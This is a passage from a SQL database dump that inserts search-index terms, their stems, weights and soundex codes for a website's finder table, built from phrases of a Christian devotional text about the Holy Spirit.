(326015, 'constrains you to', 'constrain you to', 0, 1, 1.5667, 'C5236523', 1, '*'),
(326016, 'constraint', 'constraint', 0, 0, 0.6667, 'C523653', 1, '*'),
(326017, 'constraint and', 'constraint and', 0, 1, 1.4667, 'C52365353', 1, '*'),
(326018, 'constraint and restraint', 'constraint and restraint', 0, 1, 1.8, 'C52365353623653', 1, '*'),
(326019, 'constraint as', 'constraint as', 0, 1, 1.4333, 'C5236532', 1, '*'),
(326020, 'constraint as compel', 'constraint as compel', 0, 1, 1.6667, 'C5236532514', 1, '*'),
(326021, 'constraint is', 'constraint is', 0, 1, 1.4333, 'C5236532', 1, '*'),
(326022, 'constraint is a', 'constraint is a', 0, 1, 1.5, 'C5236532', 1, '*'),
(326023, 'constraint means', 'constraint means', 0, 1, 1.5333, 'C52365352', 1, '*'),
(326024, 'constraint means to', 'constraint means to', 0, 1, 1.6333, 'C523653523', 1, '*'),
(326025, 'contacts', 'contact', 0, 0, 0.5333, 'C53232', 1, '*'),
(326026, 'contacts us', 'contact us', 0, 1, 1.3667, 'C53232', 1, '*'),
(326027, 'contacts us is', 'contact us is', 0, 1, 1.4667, 'C53232', 1, '*'),
(326028, 'continually', 'continu', 0, 0, 0.7333, 'C5354', 1, '*'),
(326029, 'continually strives', 'continu strives', 0, 1, 1.6333, 'C535423612', 1, '*'),
(326030, 'continually strives with', 'continu strives with', 0, 1, 1.8, 'C5354236123', 1, '*'),
(326031, 'customized', 'custom', 0, 0, 0.6667, 'C3523', 1, '*'),
(326032, 'customized operation', 'custom operation', 0, 1, 1.6667, 'C35231635', 1, '*'),
(326033, 'customized operation you', 'custom operation you', 0, 1, 1.8, 'C35231635', 1, '*'),
(326034, 'daily practice', 'daili practice', 0, 1, 1.4667, 'D416232', 1, '*'),
(326035, 'daily practice to', 'daili practice to', 0, 1, 1.5667, 'D4162323', 1, '*'),
(326036, 'date you', 'date you', 0, 1, 1.2667, 'D000', 1, '*'),
(326037, 'date you can', 'date you can', 0, 1, 1.4, 'D250', 1, '*'),
(326038, 'david said', 'david said', 0, 1, 1.3333, 'D1323', 1, '*'),
(326039, 'david said who', 'david said who', 0, 1, 1.4667, 'D1323', 1, '*'),
(326040, 'day of', 'dai of', 0, 1, 1.2, 'D100', 1, '*'),
(326041, 'day of redemption.”', 'dai of redemption.”', 0, 1, 1.6333, 'D1635135', 1, '*'),
(326042, 'decision many', 'decis many', 0, 1, 1.4333, 'D250', 1, '*'),
(326043, 'decision many years', 'decis many years', 0, 1, 1.6333, 'D2562', 1, '*'),
(326044, 'decisions that', 'decis that', 0, 1, 1.4667, 'D2523', 1, '*'),
(326045, 'decisions that keep', 'decis that keep', 0, 1, 1.6333, 'D252321', 1, '*'),
(326046, 'develop confidence', 'develop confidence', 0, 1, 1.6, 'D141251352', 1, '*'),
(326047, 'develop confidence in', 'develop confidence in', 0, 1, 1.7, 'D1412513525', 1, '*'),
(326048, 'did not recover', 'did not recover', 0, 1, 1.5, 'D536216', 1, '*'),
(326049, 'didn\'t work', 'didn work', 0, 1, 1.3667, 'D5362', 1, '*'),
(326050, 'didn\'t work out', 'didn work out', 0, 1, 1.5, 'D53623', 1, '*'),
(326051, 'disaster is', 'disast is', 0, 1, 1.3667, 'D2362', 1, '*'),
(326052, 'disaster is imminent', 'disast is imminent', 0, 1, 1.6667, 'D236253', 1, '*'),
(326053, 'disobedience to a', 'disobedi to a', 0, 1, 1.5667, 'D213523', 1, '*'),
(326054, 'disobey him', 'disobei him', 0, 1, 1.3667, 'D215', 1, '*'),
(326055, 'disobey him 1', 'disobei him 1', 0, 1, 1.4333, 'D215', 1, '*'),
(326056, 'disobey the', 'disobei the', 0, 1, 1.3667, 'D213', 1, '*'),
(326057, 'disobey the holy', 'disobei the holy', 0, 1, 1.5333, 'D2134', 1, '*'),
(326058, 'disobey the instructions', 'disobei the instructions', 0, 1, 1.8, 'D21352362352', 1, '*'),
(326059, 'divine communications', 'divin communications', 0, 1, 1.7, 'D15252352', 1, '*'),
(326060, 'divine communications from', 'divin communications from', 0, 1, 1.8667, 'D15252352165', 1, '*'),
(326061, 'divine instruction bitterness', 'divin instruction bitterness', 0, 1, 1.9667, 'D1523623513652', 1, '*'),
(326062, 'do it 4', 'do it 4', 0, 1, 1.2333, 'D000', 1, '*'),
(326063, 'do it as', 'do it as', 0, 1, 1.2667, 'D200', 1, '*'),
(326064, 'do not attack', 'do not attack', 0, 1, 1.4333, 'D532', 1, '*'),
(326065, 'do not belittle', 'do not belittle', 0, 1, 1.5, 'D531434', 1, '*'),
(326066, 'do not disobey', 'do not disobey', 0, 1, 1.4667, 'D5321', 1, '*'),
(326067, 'do not ignore', 'do not ignore', 0, 1, 1.4333, 'D53256', 1, '*'),
(326068, 'do not join', 'do not join', 0, 1, 1.3667, 'D5325', 1, '*'),
(326069, 'do not strive', 'do not strive', 0, 1, 1.4333, 'D532361', 1, '*'),
(326070, 'do not trivialize', 'do not trivialize', 0, 1, 1.5667, 'D536142', 1, '*'),
(326071, 'do something by', 'do something by', 0, 1, 1.5, 'D253521', 1, '*'),
(326072, 'do something restraint', 'do something restraint', 0, 1, 1.7333, 'D25352623653', 1, '*'),
(326073, 'do what the', 'do what the', 0, 1, 1.3667, 'D000', 1, '*'),
(326074, 'don\'t also', 'don also', 0, 1, 1.3333, 'D5342', 1, '*'),
(326075, 'don\'t also come', 'don also come', 0, 1, 1.5, 'D53425', 1, '*'),
(326076, 'don\'t do it', 'don do it', 0, 1, 1.3667, 'D530', 1, '*'),
(326077, 'don\'t grieve', 'don grieve', 0, 1, 1.4, 'D53261', 1, '*'),
(326078, 'don\'t grieve him', 'don grieve him', 0, 1, 1.5333, 'D532615', 1, '*'),
(326079, 'don\'t have a', 'don have a', 0, 1, 1.4, 'D531', 1, '*'),
(326080, 'don\'t ignore', 'don ignore', 0, 1, 1.4, 'D53256', 1, '*'),
(326081, 'don\'t ignore him', 'don ignore him', 0, 1, 1.5333, 'D532565', 1, '*'),
(326082, 'don\'t take him', 'don take him', 0, 1, 1.4667, 'D5325', 1, '*'),
(326083, 'don\'t take the', 'don take the', 0, 1, 1.4667, 'D5323', 1, '*'),
(326084, 'don\'t treat', 'don treat', 0, 1, 1.3667, 'D5363', 1, '*'),
(326085, 'don\'t treat him', 'don treat him', 0, 1, 1.5, 'D53635', 1, '*'),
(326086, 'end 10', 'end 10', 0, 1, 1.2, 'E530', 1, '*'),
(326087, 'end 10 do', 'end 10 do', 0, 1, 1.3, 'E530', 1, '*'),
(326088, 'enter into', 'enter into', 0, 1, 1.3333, 'E53653', 1, '*'),
(326089, 'enter into the', 'enter into the', 0, 1, 1.4667, 'E53653', 1, '*'),
(326090, 'envy', 'envi', 0, 0, 0.2667, 'E510', 1, '*'),
(326091, 'envy to', 'envi to', 0, 1, 1.2333, 'E513', 1, '*'),
(326092, 'envy to mention', 'envi to mention', 0, 1, 1.5, 'E513535', 1, '*'),
(326093, 'ephesians 4', 'ephesian 4', 0, 1, 1.3667, 'E1252', 1, '*'),
(326094, 'ephesians 4 30', 'ephesian 4 30', 0, 1, 1.4667, 'E1252', 1, '*'),
(326095, 'equally', 'equal', 0, 0, 0.4667, 'E240', 1, '*'),
(326096, 'equally strong', 'equal strong', 0, 1, 1.4667, 'E2423652', 1, '*'),
(326097, 'equally strong inner', 'equal strong inner', 0, 1, 1.6667, 'E242365256', 1, '*'),
(326098, 'eventually you', 'eventu you', 0, 1, 1.4667, 'E1534', 1, '*'),
(326099, 'eventually you will', 'eventu you will', 0, 1, 1.6333, 'E1534', 1, '*'),
(326100, 'every situation of', 'everi situation of', 0, 1, 1.6, 'E162351', 1, '*'),
(326101, 'evil-speaking', 'evil-speak', 0, 0, 0.8667, 'E1421252', 1, '*'),
(326102, 'evil-speaking malice', 'evil-speak malice', 0, 1, 1.6667, 'E1421252542', 1, '*'),
(326103, 'evil-speaking malice envy', 'evil-speak malice envy', 0, 1, 1.8333, 'E142125254251', 1, '*'),
(326104, 'fails', 'fail', 0, 0, 0.3333, 'F420', 1, '*'),
(326105, 'fails and', 'fail and', 0, 1, 1.3, 'F4253', 1, '*'),
(326106, 'fails and your', 'fail and your', 0, 1, 1.4667, 'F42536', 1, '*'),
(326107, 'few are', 'few are', 0, 1, 1.2333, 'F600', 1, '*'),
(326108, 'few are some', 'few are some', 0, 1, 1.4, 'F625', 1, '*'),
(326109, 'first point', 'first point', 0, 1, 1.3667, 'F623153', 1, '*'),
(326110, 'first point of', 'first point of', 0, 1, 1.4667, 'F6231531', 1, '*'),
(326111, 'for a future', 'for a future', 0, 1, 1.4, 'F6136', 1, '*'),
(326112, 'for granted', 'for granted', 0, 1, 1.3667, 'F62653', 1, '*'),
(326113, 'for granted no', 'for granted no', 0, 1, 1.4667, 'F626535', 1, '*'),
(326114, 'for granted so', 'for granted so', 0, 1, 1.4667, 'F626532', 1, '*'),
(326115, 'for your spirit-man', 'for your spirit-man', 0, 1, 1.6333, 'F621635', 1, '*'),
(326116, 'force or', 'forc or', 0, 1, 1.2667, 'F626', 1, '*'),
(326117, 'force or by', 'forc or by', 0, 1, 1.3667, 'F6261', 1, '*'),
(326118, 'former', 'former', 0, 0, 0.4, 'F656', 1, '*'),
(326119, 'former way', 'former way', 0, 1, 1.3333, 'F656', 1, '*'),
(326120, 'former way of', 'former way of', 0, 1, 1.4333, 'F6561', 1, '*'),
(326121, 'freedom', 'freedom', 0, 0, 0.4667, 'F635', 1, '*'),
(326122, 'freedom of', 'freedom of', 0, 1, 1.3333, 'F6351', 1, '*'),
(326123, 'freedom of action', 'freedom of action', 0, 1, 1.5667, 'F6351235', 1, '*'),
(326124, 'from it', 'from it', 0, 1, 1.2333, 'F653', 1, '*'),
(326125, 'from it make', 'from it make', 0, 1, 1.4, 'F65352', 1, '*'),
(326126, 'from your spirit-man', 'from your spirit-man', 0, 1, 1.6667, 'F65621635', 1, '*'),
(326127, 'future of pain', 'futur of pain', 0, 1, 1.4667, 'F3615', 1, '*'),
(326128, 'gen 6', 'gen 6', 0, 1, 1.1667, 'G500', 1, '*'),
(326129, 'gen 6 3', 'gen 6 3', 0, 1, 1.2333, 'G500', 1, '*'),
(326130, 'ghost the realms', 'ghost the realms', 0, 1, 1.5333, 'G36452', 1, '*'),
(326131, 'ghost to', 'ghost to', 0, 1, 1.2667, 'G300', 1, '*'),
(326132, 'ghost to move', 'ghost to move', 0, 1, 1.4333, 'G351', 1, '*'),
(326133, 'go ahead', 'go ahead', 0, 1, 1.2667, 'G300', 1, '*'),
(326134, 'go ahead do', 'go ahead do', 0, 1, 1.3667, 'G300', 1, '*'),
(326135, 'go ahead some', 'go ahead some', 0, 1, 1.4333, 'G325', 1, '*'),
(326136, 'god only when', 'god only when', 0, 1, 1.4333, 'G3545', 1, '*'),
(326137, 'god whereby', 'god whereby', 0, 1, 1.3667, 'G361', 1, '*'),
(326138, 'god whereby ye', 'god whereby ye', 0, 1, 1.4667, 'G361', 1, '*'),
(326139, 'granted', 'grant', 0, 0, 0.4667, 'G653', 1, '*'),
(326140, 'granted no', 'grant no', 0, 1, 1.3333, 'G6535', 1, '*'),
(326141, 'granted no man', 'grant no man', 0, 1, 1.4667, 'G6535', 1, '*'),
(326142, 'granted so', 'grant so', 0, 1, 1.3333, 'G6532', 1, '*'),
(326143, 'granted so don\'t', 'grant so don', 0, 1, 1.5333, 'G6532353', 1, '*'),
(326144, 'grieve him', 'griev him', 0, 1, 1.3333, 'G615', 1, '*'),
(326145, 'grieve him ephesians', 'griev him ephesians', 0, 1, 1.6667, 'G6151252', 1, '*'),
(326146, 'grieve not', 'griev not', 0, 1, 1.3333, 'G6153', 1, '*'),
(326147, 'grieve not the', 'griev not the', 0, 1, 1.4667, 'G6153', 1, '*'),
(326148, 'grow in your', 'grow in your', 0, 1, 1.4, 'G656', 1, '*'),
(326149, 'guiltless when', 'guiltless when', 0, 1, 1.4667, 'G43425', 1, '*'),
(326150, 'guiltless when someone', 'guiltless when someone', 0, 1, 1.7333, 'G4342525', 1, '*'),
(326151, 'happens disaster', 'happen disaster', 0, 1, 1.5333, 'H1523236', 1, '*'),
(326152, 'happens disaster is', 'happen disaster is', 0, 1, 1.6333, 'H15232362', 1, '*'),
(326153, 'have a right', 'have a right', 0, 1, 1.4, 'H1623', 1, '*'),
(326154, 'have a sugar-daddy', 'have a sugar-daddy', 0, 1, 1.6, 'H1263', 1, '*'),
(326155, 'have kept to', 'have kept to', 0, 1, 1.4, 'H1213', 1, '*'),
(326156, 'have problems', 'have problems', 0, 1, 1.4333, 'H161452', 1, '*'),
(326157, 'have problems and', 'have problems and', 0, 1, 1.5667, 'H16145253', 1, '*'),
(326158, 'have tried', 'have tried', 0, 1, 1.3333, 'H1363', 1, '*'),
(326159, 'have tried all', 'have tried all', 0, 1, 1.4667, 'H13634', 1, '*'),
(326160, 'he brings', 'he brings', 0, 1, 1.3, 'H1652', 1, '*'),
(326161, 'he brings the', 'he brings the', 0, 1, 1.4333, 'H16523', 1, '*'),
(326162, 'he knows where', 'he knows where', 0, 1, 1.4667, 'H2526', 1, '*'),
(326163, 'heart 02 08', 'heart 02 08', 0, 1, 1.3667, 'H630', 1, '*'),
(326164, 'heart 19 08', 'heart 19 08', 0, 1, 1.3667, 'H630', 1, '*'),
(326165, 'him 1 sam', 'him 1 sam', 0, 1, 1.3, 'H525', 1, '*'),
(326166, 'him after', 'him after', 0, 1, 1.3, 'H5136', 1, '*'),
(326167, 'him after you', 'him after you', 0, 1, 1.4333, 'H5136', 1, '*'),
(326168, 'him any', 'him any', 0, 1, 1.2333, 'H500', 1, '*'),
(326169, 'him any longer', 'him any longer', 0, 1, 1.4667, 'H54526', 1, '*'),
(326170, 'him be', 'him be', 0, 1, 1.2, 'H510', 1, '*'),
(326171, 'him be lord', 'him be lord', 0, 1, 1.3667, 'H51463', 1, '*'),
(326172, 'him by', 'him by', 0, 1, 1.2, 'H510', 1, '*'),
(326173, 'him by calling', 'him by calling', 0, 1, 1.4667, 'H512452', 1, '*'),
(326174, 'him ephesians', 'him ephesians', 0, 1, 1.4333, 'H51252', 1, '*'),
(326175, 'him ephesians 4', 'him ephesians 4', 0, 1, 1.5, 'H51252', 1, '*'),
(326176, 'him for granted', 'him for granted', 0, 1, 1.5, 'H5162653', 1, '*'),
(326177, 'him gen', 'him gen', 0, 1, 1.2333, 'H525', 1, '*'),
(326178, 'him gen 6', 'him gen 6', 0, 1, 1.3, 'H525', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(326179, 'him i made', 'him i made', 0, 1, 1.3333, 'H530', 1, '*'),
(326180, 'him like', 'him like', 0, 1, 1.2667, 'H542', 1, '*'),
(326181, 'him like a', 'him like a', 0, 1, 1.3333, 'H542', 1, '*'),
(326182, 'him one', 'him one', 0, 1, 1.2333, 'H500', 1, '*'),
(326183, 'him one of', 'him one of', 0, 1, 1.3333, 'H510', 1, '*'),
(326184, 'him something', 'him something', 0, 1, 1.4333, 'H525352', 1, '*'),
(326185, 'him something or', 'him something or', 0, 1, 1.5333, 'H5253526', 1, '*'),
(326186, 'him when that', 'him when that', 0, 1, 1.4333, 'H530', 1, '*'),
(326187, 'him whenever', 'him whenever', 0, 1, 1.4, 'H516', 1, '*'),
(326188, 'him whenever he', 'him whenever he', 0, 1, 1.5, 'H516', 1, '*'),
(326189, 'his operations in', 'hi operations in', 0, 1, 1.5667, 'H2163525', 1, '*'),
(326190, 'his personality', 'hi personality', 0, 1, 1.5, 'H2162543', 1, '*'),
(326191, 'his personality stop', 'hi personality stop', 0, 1, 1.6667, 'H2162543231', 1, '*'),
(326192, 'holy ghost to', 'holi ghost to', 0, 1, 1.4333, 'H423', 1, '*'),
(326193, 'holy spirit 3', 'holi spirit 3', 0, 1, 1.4333, 'H42163', 1, '*'),
(326194, 'holy spirit 6', 'holi spirit 6', 0, 1, 1.4333, 'H42163', 1, '*'),
(326195, 'holy spirit a', 'holi spirit a', 0, 1, 1.4333, 'H42163', 1, '*'),
(326196, 'holy spirit be', 'holi spirit be', 0, 1, 1.4667, 'H421631', 1, '*'),
(326197, 'holy spirit contacts', 'holi spirit contacts', 0, 1, 1.6667, 'H42163253232', 1, '*'),
(326198, 'holy spirit for', 'holi spirit for', 0, 1, 1.5, 'H4216316', 1, '*'),
(326199, 'holy spirit of', 'holi spirit of', 0, 1, 1.4667, 'H421631', 1, '*'),
(326200, 'holy spirit operations', 'holi spirit operations', 0, 1, 1.7333, 'H4216316352', 1, '*'),
(326201, 'holy spirit saul', 'holi spirit saul', 0, 1, 1.5333, 'H4216324', 1, '*'),
(326202, 'holy spirit taking', 'holi spirit taking', 0, 1, 1.6, 'H42163252', 1, '*'),
(326203, 'holy spirit there', 'holi spirit there', 0, 1, 1.5667, 'H421636', 1, '*'),
(326204, 'holy spirit wrath', 'holi spirit wrath', 0, 1, 1.5667, 'H4216363', 1, '*'),
(326205, 'i have kept', 'i have kept', 0, 1, 1.3667, 'I1213', 1, '*'),
(326206, 'i made', 'i made', 0, 1, 1.2, 'I530', 1, '*'),
(326207, 'i made a', 'i made a', 0, 1, 1.2667, 'I530', 1, '*'),
(326208, 'i wrote', 'i wrote', 0, 1, 1.2333, 'I630', 1, '*'),
(326209, 'i wrote a', 'i wrote a', 0, 1, 1.3, 'I630', 1, '*'),
(326210, 'if a', 'if a', 0, 1, 1.1333, 'I100', 1, '*'),
(326211, 'if a leader', 'if a leader', 0, 1, 1.3667, 'I1436', 1, '*'),
(326212, 'ignore him', 'ignor him', 0, 1, 1.3333, 'I2565', 1, '*'),
(326213, 'ignore him one', 'ignor him one', 0, 1, 1.4667, 'I2565', 1, '*'),
(326214, 'ignore him whenever', 'ignor him whenever', 0, 1, 1.6333, 'I256516', 1, '*'),
(326215, 'ignoring', 'ignor', 0, 0, 0.5333, 'I25652', 1, '*'),
(326216, 'ignoring this', 'ignor this', 0, 1, 1.4333, 'I2565232', 1, '*'),
(326217, 'ignoring this communication', 'ignor this communication', 0, 1, 1.9, 'I25652325235', 1, '*'),
(326218, 'imminent never', 'immin never', 0, 1, 1.4667, 'I53516', 1, '*'),
(326219, 'imminent never allow', 'immin never allow', 0, 1, 1.6667, 'I535164', 1, '*'),
(326220, 'in anything', 'in anything', 0, 1, 1.3667, 'I5352', 1, '*'),
(326221, 'in anything you', 'in anything you', 0, 1, 1.5, 'I5352', 1, '*'),
(326222, 'in him once', 'in him once', 0, 1, 1.3667, 'I520', 1, '*'),
(326223, 'in the affairs', 'in the affairs', 0, 1, 1.4667, 'I53162', 1, '*'),
(326224, 'in thisworld', 'in thisworld', 0, 1, 1.4, 'I532643', 1, '*'),
(326225, 'in thisworld are', 'in thisworld are', 0, 1, 1.5333, 'I5326436', 1, '*'),
(326226, 'in you or', 'in you or', 0, 1, 1.3, 'I560', 1, '*'),
(326227, 'in you will', 'in you will', 0, 1, 1.3667, 'I540', 1, '*'),
(326228, 'in your relationship', 'in your relationship', 0, 1, 1.6667, 'I5643521', 1, '*'),
(326229, 'individuals that', 'individu that', 0, 1, 1.5333, 'I5313423', 1, '*'),
(326230, 'individuals that want', 'individu that want', 0, 1, 1.7, 'I531342353', 1, '*'),
(326231, 'influence he', 'influenc he', 0, 1, 1.4, 'I51452', 1, '*'),
(326232, 'influence he is', 'influenc he is', 0, 1, 1.5, 'I51452', 1, '*'),
(326233, 'influence is belittling', 'influenc is belittling', 0, 1, 1.7667, 'I51452143452', 1, '*'),
(326234, 'influence the holy', 'influenc the holy', 0, 1, 1.6, 'I5145234', 1, '*'),
(326235, 'inner pressure', 'inner pressure', 0, 1, 1.4667, 'I561626', 1, '*'),
(326236, 'inner pressure not', 'inner pressure not', 0, 1, 1.6, 'I56162653', 1, '*'),
(326237, 'inner pressure to', 'inner pressure to', 0, 1, 1.5667, 'I5616263', 1, '*'),
(326238, 'instruction bitterness', 'instruct bitterness', 0, 1, 1.7333, 'I523623513652', 1, '*'),
(326239, 'instruction bitterness evil-speaking', 'instruct bitterness evil-speaking', 0, 1, 2, 'I5236235136521421252', 1, '*'),
(326240, 'instructions of', 'instruct of', 0, 1, 1.5, 'I523623521', 1, '*'),
(326241, 'instructions of the', 'instruct of the', 0, 1, 1.6333, 'I5236235213', 1, '*'),
(326242, 'into the realms', 'into the realms', 0, 1, 1.5, 'I536452', 1, '*'),
(326243, 'is a person', 'is a person', 0, 1, 1.3667, 'I21625', 1, '*'),
(326244, 'is a strong', 'is a strong', 0, 1, 1.3667, 'I23652', 1, '*'),
(326245, 'is an equally', 'is an equally', 0, 1, 1.4333, 'I2524', 1, '*'),
(326246, 'is belittling', 'is belittling', 0, 1, 1.4333, 'I2143452', 1, '*'),
(326247, 'is belittling his', 'is belittling his', 0, 1, 1.5667, 'I2143452', 1, '*'),
(326248, 'is imminent never', 'is imminent never', 0, 1, 1.5667, 'I253516', 1, '*'),
(326249, 'is operating', 'is operating', 0, 1, 1.4, 'I216352', 1, '*'),
(326250, 'is operating under', 'is operating under', 0, 1, 1.6, 'I216352536', 1, '*'),
(326251, 'is possible', 'is possible', 0, 1, 1.3667, 'I21214', 1, '*'),
(326252, 'is possible for', 'is possible for', 0, 1, 1.5, 'I2121416', 1, '*'),
(326253, 'is preparing', 'is preparing', 0, 1, 1.4, 'I2161652', 1, '*'),
(326254, 'is preparing for', 'is preparing for', 0, 1, 1.5333, 'I216165216', 1, '*'),
(326255, 'is solved', 'is solved', 0, 1, 1.3, 'I2413', 1, '*'),
(326256, 'is solved they', 'is solved they', 0, 1, 1.4667, 'I2413', 1, '*'),
(326257, 'is through', 'is through', 0, 1, 1.3333, 'I2362', 1, '*'),
(326258, 'is through constraint', 'is through constraint', 0, 1, 1.7, 'I2362523653', 1, '*'),
(326259, 'israel did', 'israel did', 0, 1, 1.3333, 'I2643', 1, '*'),
(326260, 'israel did not', 'israel did not', 0, 1, 1.4667, 'I264353', 1, '*'),
(326261, 'it 4', 'it 4', 0, 1, 1.1333, 'I300', 1, '*'),
(326262, 'it 4 do', 'it 4 do', 0, 1, 1.2333, 'I300', 1, '*'),
(326263, 'it as a', 'it as a', 0, 1, 1.2333, 'I320', 1, '*'),
(326264, 'it didn\'t', 'it didn', 0, 1, 1.3, 'I353', 1, '*'),
(326265, 'it didn\'t work', 'it didn work', 0, 1, 1.4667, 'I35362', 1, '*'),
(326266, 'it is possible', 'it is possible', 0, 1, 1.4667, 'I321214', 1, '*'),
(326267, 'it make', 'it make', 0, 1, 1.2333, 'I352', 1, '*'),
(326268, 'it make it', 'it make it', 0, 1, 1.3333, 'I3523', 1, '*'),
(326269, 'it your', 'it your', 0, 1, 1.2333, 'I360', 1, '*'),
(326270, 'it your daily', 'it your daily', 0, 1, 1.4333, 'I3634', 1, '*'),
(326271, 'item 60', 'item 60', 0, 1, 1.2333, 'I350', 1, '*'),
(326272, 'item 60 from', 'item 60 from', 0, 1, 1.4, 'I35165', 1, '*'),
(326273, 'jesus in anything', 'jesu in anything', 0, 1, 1.5667, 'J5352', 1, '*'),
(326274, 'jesus name till', 'jesu name till', 0, 1, 1.5, 'J534', 1, '*'),
(326275, 'jesus to lead', 'jesu to lead', 0, 1, 1.4333, 'J343', 1, '*'),
(326276, 'join people', 'join people', 0, 1, 1.3667, 'J514', 1, '*'),
(326277, 'join people to', 'join people to', 0, 1, 1.4667, 'J5143', 1, '*'),
(326278, 'k2 item 60', 'k2 item 60', 0, 1, 1.3333, 'K350', 1, '*'),
(326279, 'keep you', 'keep you', 0, 1, 1.2667, 'K100', 1, '*'),
(326280, 'keep you safe', 'keep you safe', 0, 1, 1.4333, 'K121', 1, '*'),
(326281, 'keep your relationship', 'keep your relationship', 0, 1, 1.7333, 'K1643521', 1, '*'),
(326282, 'kept to', 'kept to', 0, 1, 1.2333, 'K130', 1, '*'),
(326283, 'kept to that', 'kept to that', 0, 1, 1.4, 'K130', 1, '*'),
(326284, 'kind of relationship', 'kind of relationship', 0, 1, 1.6667, 'K531643521', 1, '*'),
(326285, 'king of', 'king of', 0, 1, 1.2333, 'K521', 1, '*'),
(326286, 'king of israel', 'king of israel', 0, 1, 1.4667, 'K521264', 1, '*'),
(326287, 'knowingly', 'knowingli', 0, 0, 0.6, 'K524', 2, '*'),
(326288, 'knowingly disobey', 'knowingli disobey', 0, 1, 1.5667, 'K524321', 1, '*'),
(326289, 'knowingly disobey the', 'knowingli disobey the', 0, 1, 1.7, 'K5243213', 1, '*'),
(326290, 'knows where', 'know where', 0, 1, 1.3667, 'K526', 1, '*'),
(326291, 'knows where all', 'know where all', 0, 1, 1.5, 'K5264', 1, '*'),
(326292, 'lead in the', 'lead in the', 0, 1, 1.3667, 'L353', 1, '*'),
(326293, 'leader fails', 'leader fails', 0, 1, 1.4, 'L36142', 1, '*'),
(326294, 'leader fails and', 'leader fails and', 0, 1, 1.5333, 'L3614253', 1, '*'),
(326295, 'let him be', 'let him be', 0, 1, 1.3333, 'L351', 1, '*'),
(326296, 'life 7', 'life 7', 0, 1, 1.2, 'L100', 1, '*'),
(326297, 'life 7 do', 'life 7 do', 0, 1, 1.3, 'L130', 1, '*'),
(326298, 'life be', 'life be', 0, 1, 1.2333, 'L100', 1, '*'),
(326299, 'life be careful', 'life be careful', 0, 1, 1.5, 'L12614', 1, '*'),
(326300, 'life don\'t also', 'life don also', 0, 1, 1.5, 'L135342', 1, '*'),
(326301, 'life he knows', 'life he knows', 0, 1, 1.4333, 'L1252', 1, '*'),
(326302, 'life let him', 'life let him', 0, 1, 1.4, 'L1435', 1, '*'),
(326303, 'like a plague', 'like a plague', 0, 1, 1.4333, 'L2142', 1, '*'),
(326304, 'like a spare-tyre', 'like a spare-tyre', 0, 1, 1.5667, 'L21636', 1, '*'),
(326305, 'limits', 'limit', 0, 0, 0.4, 'L532', 1, '*'),
(326306, 'limits one\'s', 'limit one', 0, 1, 1.4, 'L53252', 1, '*'),
(326307, 'limits one\'s freedom', 'limit one freedom', 0, 1, 1.6667, 'L532521635', 1, '*'),
(326308, 'longer you', 'longer you', 0, 1, 1.3333, 'L526', 1, '*'),
(326309, 'longer you have', 'longer you have', 0, 1, 1.5, 'L5261', 1, '*'),
(326310, 'lord 9', 'lord 9', 0, 1, 1.2, 'L630', 1, '*'),
(326311, 'lord 9 do', 'lord 9 do', 0, 1, 1.3, 'L630', 1, '*'),
(326312, 'lord said my', 'lord said my', 0, 1, 1.4, 'L63235', 1, '*'),
(326313, 'lord\'s anointed', 'lord anointed', 0, 1, 1.5, 'L63253', 1, '*'),
(326314, 'lord\'s anointed and', 'lord anointed and', 0, 1, 1.6333, 'L6325353', 1, '*'),
(326315, 'lose to', 'lose to', 0, 1, 1.2333, 'L230', 1, '*'),
(326316, 'lose to him', 'lose to him', 0, 1, 1.3667, 'L235', 1, '*'),
(326317, 'lose to the', 'lose to the', 0, 1, 1.3667, 'L230', 1, '*'),
(326318, 'lose to win', 'lose to win', 0, 1, 1.3667, 'L235', 1, '*'),
(326319, 'lose to you', 'lose to you', 0, 1, 1.3667, 'L230', 1, '*'),
(326320, 'lose when', 'lose when', 0, 1, 1.3, 'L250', 1, '*'),
(326321, 'lose when a', 'lose when a', 0, 1, 1.3667, 'L250', 1, '*'),
(326322, 'made a decision', 'made a decision', 0, 1, 1.5, 'M325', 1, '*'),
(326323, 'make it your', 'make it your', 0, 1, 1.4, 'M236', 1, '*'),
(326324, 'make somebody', 'make somebody', 0, 1, 1.4333, 'M2513', 1, '*'),
(326325, 'make somebody do', 'make somebody do', 0, 1, 1.5333, 'M2513', 1, '*'),
(326326, 'malice envy', 'malic envy', 0, 1, 1.3667, 'M4251', 1, '*'),
(326327, 'malice envy to', 'malic envy to', 0, 1, 1.4667, 'M42513', 1, '*'),
(326328, 'man .”', 'man .”', 0, 1, 1.2, 'M000', 1, '*'),
(326329, 'man .” i', 'man .” i', 0, 1, 1.2667, 'M000', 1, '*'),
(326330, 'man can stand', 'man can stand', 0, 1, 1.4333, 'M252353', 1, '*'),
(326331, 'man continually', 'man continually', 0, 1, 1.5, 'M25354', 1, '*'),
(326332, 'man continually strives', 'man continually strives', 0, 1, 1.7667, 'M2535423612', 1, '*'),
(326333, 'man to grieve', 'man to grieve', 0, 1, 1.4333, 'M3261', 1, '*'),
(326334, 'many years', 'mani years', 0, 1, 1.3333, 'M620', 1, '*'),
(326335, 'many years ago', 'mani years ago', 0, 1, 1.4667, 'M620', 1, '*'),
(326336, 'means to make', 'mean to make', 0, 1, 1.4333, 'M2352', 1, '*'),
(326337, 'mention', 'mention', 0, 0, 0.4667, 'M350', 1, '*'),
(326338, 'mention a', 'mention a', 0, 1, 1.3, 'M350', 1, '*'),
(326339, 'mention a few', 'mention a few', 0, 1, 1.4333, 'M351', 1, '*'),
(326340, 'move in', 'move in', 0, 1, 1.2333, 'M150', 1, '*'),
(326341, 'move in your', 'move in your', 0, 1, 1.4, 'M156', 1, '*'),
(326342, 'must always allow', 'must always allow', 0, 1, 1.5667, 'M23424', 1, '*'),
(326343, 'must avoid', 'must avoid', 0, 1, 1.3333, 'M2313', 1, '*'),
(326344, 'must avoid as', 'must avoid as', 0, 1, 1.4333, 'M23132', 1, '*'),
(326345, 'must develop confidence', 'must develop confidence', 0, 1, 1.7667, 'M23141251352', 1, '*'),
(326346, 'my spirit shall', 'my spirit shall', 0, 1, 1.5, 'M216324', 1, '*'),
(326347, 'need in', 'need in', 0, 1, 1.2333, 'N350', 1, '*'),
(326348, 'need in thisworld', 'need in thisworld', 0, 1, 1.5667, 'N3532643', 1, '*'),
(326349, 'never allow the', 'never allow the', 0, 1, 1.5, 'N1643', 1, '*'),
(326350, 'no man can', 'no man can', 0, 1, 1.3333, 'N250', 1, '*'),
